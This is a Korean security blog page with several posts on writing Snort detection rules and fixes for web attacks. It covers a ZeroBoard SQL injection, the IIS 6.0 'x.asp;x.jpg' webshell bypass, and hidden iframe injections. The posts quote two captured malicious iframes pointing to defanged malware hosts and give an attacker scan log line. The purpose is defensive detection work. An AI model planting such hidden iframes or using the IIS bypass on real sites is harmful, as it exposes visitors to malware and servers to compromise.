익스플로잇/웜 분석 및 테스트2012. 3. 9. 11:52

보안장비 정책 설정 중 특이 로그 발견-1


GET /skin/board/mw.basic.old/cheditor/popup/image.html HTTP/1.1
Host: www.XXXX.com

장비 정책상 .old로 탐지되었는데 해당 도메인은 위 uri가 없다..
그래서 구글에 검색해보니 그누보드에 탑재된 cheditor 를 찾기위한 스캔인 것으로 보임.

공격자 : 222.78.78.229(CN)

'익스플로잇/웜 분석 및 테스트' 카테고리의 다른 글

카카오톡 안드로이드 초기 버전, 최신버전 업데이트 필요  (1) 2011.04.04
ZeroBoard PHP Mass Sql-Injection(download.php)  (0) 2010.01.26
IIS 6.0 x.asp;x.jpg / x.php;x.jpg File Execution(IIS 6.0 Webshell 우회 방법)  (1) 2009.10.21
iframe 신종(?)우회 방법-2  (0) 2009.10.09
iframe 신종(?) 우회 방법  (0) 2009.10.08
Posted by regexkorea
익스플로잇/웜 분석 및 테스트2011. 4. 4. 10:33

카카오톡 안드로이드 초기 버전, 최신버전 업데이트 필요

카카오톡 안드로이드 초기 버전, 최신버전 업데이트 필요

http://www.boannews.com/media/view.asp?idx=25531&kind=1

기사 나왔다..^^;

서로 협조하는 과정이 힘들었다..ㅜㅜ 다시는 안해야지..^^;

'익스플로잇/웜 분석 및 테스트' 카테고리의 다른 글

보안장비 정책 설정 중 특이 로그 발견-1  (0) 2012.03.09
ZeroBoard PHP Mass Sql-Injection(download.php)  (0) 2010.01.26
IIS 6.0 x.asp;x.jpg / x.php;x.jpg File Execution(IIS 6.0 Webshell 우회 방법)  (1) 2009.10.21
iframe 신종(?)우회 방법-2  (0) 2009.10.09
iframe 신종(?) 우회 방법  (0) 2009.10.08
Posted by regexkorea
익스플로잇/웜 분석 및 테스트2010. 1. 26. 08:57

ZeroBoard PHP Mass Sql-Injection(download.php)


시큐리티 플러스의 방립동님이 올려주신 블로그 내용입니다.tp://www.securityplu
http://www.securityplus.or.kr/xe/?document_srl=17273&vid=bangrip1

위 블로그 내용에서 상세한 내용을 다뤘기 때문에 참고하시면 될것 같습니다.

제가 추출한 패턴은 다음과 같습니다.

alert tcp any any -> any 80 (msg:”Zeroboard PHP Mass Sql-Injection(download.php)”; flow:established, to_server; uricontent:”/download.php”; nocase; pcre:”/\/download\.php\?id=.*&filenum=(1|2)=.*,memo=concat\(/si"; )

테스트과정을 거쳐 변경사항이 생기면 변경하겠습니다.

더욱 좋은 방법은 download.php 파일 수정하는 방법입니다.

참고 : http://www.xpressengine.com/zb4_security/18448449

기존
mysql_query(“update $t_board”.”_$id set download”.$filenum.”=download”.$filenum.”+1 where no=’$no’”);

변경
if($filenum == 1)
    mysql_query(“UPDATE “.$t_board.”_”.$id.” SET download1 = download1+1 WHERE no=’”.$no.”‘”);
elseif($filenum == 2)
    mysql_query(“UPDATE “.$t_board.”_”.$id.” SET download2 = download2+1 WHERE no=’”.$no.”‘”);

'익스플로잇/웜 분석 및 테스트' 카테고리의 다른 글

보안장비 정책 설정 중 특이 로그 발견-1  (0) 2012.03.09
카카오톡 안드로이드 초기 버전, 최신버전 업데이트 필요  (1) 2011.04.04
IIS 6.0 x.asp;x.jpg / x.php;x.jpg File Execution(IIS 6.0 Webshell 우회 방법)  (1) 2009.10.21
iframe 신종(?)우회 방법-2  (0) 2009.10.09
iframe 신종(?) 우회 방법  (0) 2009.10.08
Posted by regexkorea
익스플로잇/웜 분석 및 테스트2009. 10. 21. 09:17

IIS 6.0 x.asp;x.jpg / x.php;x.jpg File Execution(IIS 6.0 Webshell 우회 방법)

IIS 6.0에서 파일명을 제대로 검증하지 않고 실행시키는 취약성이 발견되었다.

이 취약성에 대해서는 중국사이트에서 발견되었으며, 급속도로 Ctrl+C Ctrl+V 되어 가고 있다.. ^^


II6.0에 다 된다고 해서 테스트해보았으나 특정한 환경에서 가능하다는 것을 깨닭고 포기를 했으나, skinfosec 블로그에서 보고특정 환경에서만 가능하다는 정도만 파악했다.. 귀찮고 할일이 많아서 여유가 있으면 다시 테스트 해봐야겠다.

http://mss.skinfosec.co.kr/docs/wp-content/uploads/2009/10/skinfosec-chr-033-file-name-vulnerability-in-iis.pdf

II6.0이 설치되어 있고 OS 버전이 아래와 같으면 취약하다고 한다.
- 5.2.3790 SP1
- 5.23790 SP2
- 5.2.3790 SP2+ 최신보안 업데이트

대응방안으로는 MS社에서 패치가 나오거나 아래와 같이 설정을 변경한다.



파일의 이름은 223자까지 사용되는것으로 보이기고  jpg,gif 이외에 다른 파일 확장자도 되는지 확인 해봐야하기때문에 우선 공개된 내용으로 패턴을 만들어 보았다.
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"MS IIS 6.0 x.asp;x.jpg/x.php;x.jpg File Execution"; flow:established, to_server; pcre:"/[a-zA-Z0-9_]{1,223}\.(asp|php)\;[a-zA-Z0-9_]{1,223}\.(jpg|gif)/mi";sid:XXXX;)

'익스플로잇/웜 분석 및 테스트' 카테고리의 다른 글

보안장비 정책 설정 중 특이 로그 발견-1  (0) 2012.03.09
카카오톡 안드로이드 초기 버전, 최신버전 업데이트 필요  (1) 2011.04.04
ZeroBoard PHP Mass Sql-Injection(download.php)  (0) 2010.01.26
iframe 신종(?)우회 방법-2  (0) 2009.10.09
iframe 신종(?) 우회 방법  (0) 2009.10.08
Posted by regexkorea
익스플로잇/웜 분석 및 테스트2009. 10. 9. 14:36

iframe 신종(?)우회 방법-2


<body bgcolor="#000000"><div style="display:none">ifkujtsasiumelcsgzbuzprmotxoetb<iframe width=933 height=353 src="hxxp://beage.ru:8080/index.php" ></iframe></div>

역시 이지스(bscry)가 제공해준 코드 입니다.

젠장 순서 바뀌는 것도 생각해봐야하고 갈수록 교묘해지네요..
style="display:none" 사용하는 방법도 있네요..

아래 포스팅된걸로는 탐지되지 않습니다.. 한 패턴으로 여러개를 잡는게 좋긴한데..너무 복잡해지네요..
복잡할수록 오탐의 가능성은 커지는데..

'익스플로잇/웜 분석 및 테스트' 카테고리의 다른 글

보안장비 정책 설정 중 특이 로그 발견-1  (0) 2012.03.09
카카오톡 안드로이드 초기 버전, 최신버전 업데이트 필요  (1) 2011.04.04
ZeroBoard PHP Mass Sql-Injection(download.php)  (0) 2010.01.26
IIS 6.0 x.asp;x.jpg / x.php;x.jpg File Execution(IIS 6.0 Webshell 우회 방법)  (1) 2009.10.21
iframe 신종(?) 우회 방법  (0) 2009.10.08
Posted by regexkorea
익스플로잇/웜 분석 및 테스트2009. 10. 8. 16:51

iframe 신종(?) 우회 방법

<iframe name=c24 src='hxxp://205.234.243.220/d/index.php?'+Math.round(Math.random()*28396)+'9c10b5bc42d8' width=62 height=458 style='visibility:hidden'></iframe>

iframe 삽입 공격의 대부분은 width, height 값을 0으로 해서 웹 페이지에 삽입해서 User들이 모르게 악성파일을 설치하기 위한 목적으로 사용된다.

그렇기때문에 보안 장비에서 대부분 width, height 값이 둘 중에 0일때 탐지/차단을 한다..물론 오탐도 발생한다..^^; 그래서 좀더 세밀하게 만든다..

위 코드에서 사용된 style='visibility:hidden' 은 iframe을 보이지 않게한다..
 이런식으로 공격을 한다면 대부분의 보안 장비에서 우회할 것으로 판단된다.

여기에서 다시 생각해보면 정상적인 사이트에서 iframe에 width, height 값에 0이 아닌 값을 주고 굳이 style='visibility:hidden' 옵션을 써서 iframe을 숨길까?

alert tcp $EXTERNAL_NET $HTTP_PORTS->$HOME_NET any(msg:"iframe evation attack-visibility:hidden"; flow:established,from_server; content:"<iframe"; nocase; pcre:"/<iframe.{0,40}src=('|")(http|ftp)://.*(width|height)=[^=0].*style=('|")visibility:(\s)?hidden('|")/i"; sid:XXXXXXX; rev:1;)

오탐 발생하면 알려주시고 고칠 부분이 있으면 comment 달아주십시요..^^

ps. 위 iframe 코드를 제공해준 나의 영원한 동반자인 이지스(bscry) 고맙다..

Websense에서도 동일한 날짜(?)에 포스팅된게 있네요..그래서 패턴을 좀 바꿔봤습니다.

http://securitylabs.websense.com/content/Alerts/3488.aspx

'익스플로잇/웜 분석 및 테스트' 카테고리의 다른 글

보안장비 정책 설정 중 특이 로그 발견-1  (0) 2012.03.09
카카오톡 안드로이드 초기 버전, 최신버전 업데이트 필요  (1) 2011.04.04
ZeroBoard PHP Mass Sql-Injection(download.php)  (0) 2010.01.26
IIS 6.0 x.asp;x.jpg / x.php;x.jpg File Execution(IIS 6.0 Webshell 우회 방법)  (1) 2009.10.21
iframe 신종(?)우회 방법-2  (0) 2009.10.09
Posted by regexkorea

티스토리툴바